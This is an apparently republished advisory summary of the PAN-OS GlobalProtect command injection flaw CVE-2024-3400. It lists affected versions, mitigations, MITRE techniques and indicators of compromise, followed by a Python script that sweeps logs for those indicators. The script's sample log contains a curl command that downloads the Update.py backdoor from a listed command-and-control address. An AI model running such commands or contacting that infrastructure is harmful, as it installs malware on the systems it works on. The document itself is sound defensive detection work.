NSFOCUS CERT detected a high-severity PAN-OS command injection vulnerability (CVE-2024-3400) in Palo Alto Networks devices that could allow unauthenticated attackers to execute arbitrary code with root privileges via GlobalProtect inputs. Palo Alto Networks has issued a fix and urged users to upgrade; mitigations are available if upgrading is not immediately possible. #CVE-2024-3400 #PANOS #GlobalProtect #PaloAltoNetworks #NSFOCUSCERT
Keypoints
- Vulnerability CVE-2024-3400 is a command injection flaw in PAN-OS that can be triggered through GlobalProtect gateway/portal input.
- The flaw has a CVSS score of 10.0 and a public proof-of-concept (PoC) exists, with active exploitation observed.
- Affected PAN-OS versions span multiple 10.2, 11.0 and 11.1 maintenance builds; a separate hotfix release exists for each affected release train, so the correct fixed version depends on the branch a device is running.
- Cloud NGFW, Panorama, and Prisma Access are not affected by this vulnerability.
- The official fix is upgrading to the patched PAN-OS hotfix releases; where upgrading isn’t immediately possible, temporary protections (vendor-provided threat-prevention signatures) and restricting access to the GlobalProtect interface are recommended.
- Manual detection involves checking whether a GlobalProtect gateway or portal is configured (Network > GlobalProtect > Gateways / Portals in the firewall web UI) to establish exposure, and reviewing device logs and files for the IoCs listed below.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Because the GlobalProtect gateway/portal does not strictly filter user input, an unauthenticated attacker can send crafted requests to the exposed interface and execute arbitrary code on the firewall. “Since GlobalProtect gateway or portal configured in PAN-OS does not strictly filter user input, unauthenticated attackers can construct special packets to execute arbitrary code on the firewall with root privileges.”
- [T1068] Exploitation for Privilege Escalation – Successful exploitation yields code execution with root privileges on the firewall, so no further escalation is needed. “execute arbitrary code on the firewall with root privileges.”
Indicators of Compromise
- [File Hash] SHA-256 of the Update.py Python backdoor – 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078
- [IP Address] Command and Control Infrastructure – 172.233.228[.]93 and 66.235.168[.]222
- [Domain] Hosted Python Backdoor domain – nhdata.s3-us-west-2.amazonaws.com
- [URL] C2 endpoints – hxxp://172.233.228[.]93/policy, hxxp://172.233.228[.]93/patch
- [File Name] Indicator – Update.py
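As an added example (not NSFOCUS or Palo Alto Networks tooling), the following script turns the IoC list above into a simple sweep over exported log lines and file contents. The IoC values are the ones listed on this page; the sample log lines are constructed for the demo and are not from a real device. It accepts both raw and defanged forms (`hxxp`, `[.]`) so indicators can be pasted in as published.

```python
"""Match the CVE-2024-3400 IoCs from the advisory summary against log lines and files.

Added example, not NSFOCUS or Palo Alto Networks code. The indicator values come
from the advisory summary above; SAMPLE_LOG is constructed for the demonstration.
"""
import hashlib
import re

# SHA-256 hashes of the Update.py Python backdoor (from the IoC list).
BACKDOOR_SHA256 = {
    "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac",
    "5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078",
}
C2_IPS = {"172.233.228.93", "66.235.168.222"}
C2_DOMAINS = {"nhdata.s3-us-west-2.amazonaws.com"}
C2_PATHS = {"/policy", "/patch"}      # endpoints observed on 172.233.228.93
FILE_NAMES = {"Update.py"}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b[a-z0-9.-]+\.[a-z]{2,}\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")


def refang(text: str) -> str:
    """Undo common defanging ([.] -> . and hxxp -> http) so both forms match."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def scan_line(line: str) -> list:
    """Return a list of (kind, value) IoC hits found in one log line."""
    hits = []
    norm = refang(line)
    for ip in IP_RE.findall(norm):
        if ip in C2_IPS:
            hits.append(("ip", ip))
            # Report the C2 URL only when the known path is paired with the C2 host.
            for path in C2_PATHS:
                if f"{ip}{path}" in norm:
                    hits.append(("url", f"http://{ip}{path}"))
    for host in HOST_RE.findall(norm):
        if host.lower() in C2_DOMAINS:
            hits.append(("domain", host.lower()))
    for name in FILE_NAMES:
        if name in norm:
            hits.append(("file", name))
    for digest in SHA256_RE.findall(norm.lower()):
        if digest in BACKDOOR_SHA256:
            hits.append(("sha256", digest))
    return hits


def scan_lines(lines) -> list:
    """Return [(line_no, line, hits)] for every line that has at least one IoC hit."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            results.append((number, line, hits))
    return results


def is_backdoor(data: bytes) -> bool:
    """True if the SHA-256 of a file's contents matches a listed Update.py hash."""
    return hashlib.sha256(data).hexdigest() in BACKDOOR_SHA256


# Constructed sample log lines for the demonstration (not real device output).
SAMPLE_LOG = [
    "2024-04-12T10:01:03 gpsvc: portal login from 203.0.113.7 succeeded",
    "2024-04-12T10:02:11 sh: curl hxxp://172.233.228[.]93/policy -o /tmp/Update.py",
    "2024-04-12T10:02:40 sh: python3 fetch from nhdata.s3-us-west-2.amazonaws.com done",
    "2024-04-12T10:03:02 gpsvc: portal login from 198.51.100.4 succeeded",
]

if __name__ == "__main__":
    for number, line, hits in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {hits}")
        print(f"    {line}")
```

Run it over log exports or a listing of files found on the device, and feed any suspicious file's bytes to `is_backdoor`. A clean sweep is not proof of non-compromise: these indicators describe one observed campaign, and an attacker who changed infrastructure or re-packed the backdoor will not match them, so the exposure check on the GlobalProtect configuration and the vendor's own guidance still apply.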
Read more: https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/